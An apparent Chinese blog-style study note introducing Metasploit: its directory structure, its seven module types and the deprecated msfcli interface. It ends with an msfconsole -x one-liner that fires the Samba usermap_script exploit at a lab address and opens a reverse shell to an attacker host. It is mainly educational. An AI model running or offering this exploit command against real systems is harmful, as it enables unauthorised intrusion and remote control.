简介msf全称Metasploit Framework,是一款功能强大的开源渗透测试工具,它提供了丰富的漏洞利用模块、扫描工具、Payload生成器和框架等功能。MSF最初由HD Moore于2003年创建,现在由Rapid7维护和发展。
因为msf是一个框架,所以可以根据自己的需求进行功能开发。
本学习基本来自官网教程----https://www.offsec.com/metasploit-unleashed/filesystem-and-libraries/。
但是官网是英语,学习还是比较费劲的(英语lower的我)。
详解msf体系图msf在kali目录主目录在\usr\share\metasploit-framework
data目录包含Metasploit用于存储某些漏洞利用、单词列表、图像等所需的二进制文件的可编辑文件documentation目录包含框架的可用文档lib目录包含框架代码库的核心代码modules目录中,您可以找到用于漏洞利用的实际MSF模块、辅助模块和后期模块、有效载荷、编码器和nop生成器。也是最主要的模块,是接下来重点学习的部分plugins目录存储着msf的插件scripts目录存储着脚本文件tools目录中有各种有用的命令行实用程序modules模块modules既上文提到的modules目录。包含了很多模块,这些模块是msf最主要最常用的功能,基本上包含了整个渗透流程所需工具。
一共有七个模块,分别是Exploits,Auxiliary,Payloads,Encoders,Nops,Post,Evasion。
Exploits,包含了很多漏洞的expAuxiliary,是个辅助模块,主要用来信息收集,包括端口扫描仪、模糊器、嗅探器等Payloads,包含了很多漏洞的payloadEncoders,编码模块,可以用来大多数的编码解码Nops,空操作模块,用于填充数据,以维持有效负载结构的完整性Post,后渗透模块,用于在目标系统上执行各种后渗透操作,如收集敏感信息、提权、横向移动等Evasion,免杀模块,用于生成一些免杀木马msfclimsfcli是早期的msf命令行接口,可以通过此接口来使用一些msf功能模块。
在2015-06-18后被弃用,可以使用msfconsole -x 来替代,例如:
代码语言:javascript代码运行次数:0运行复制root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"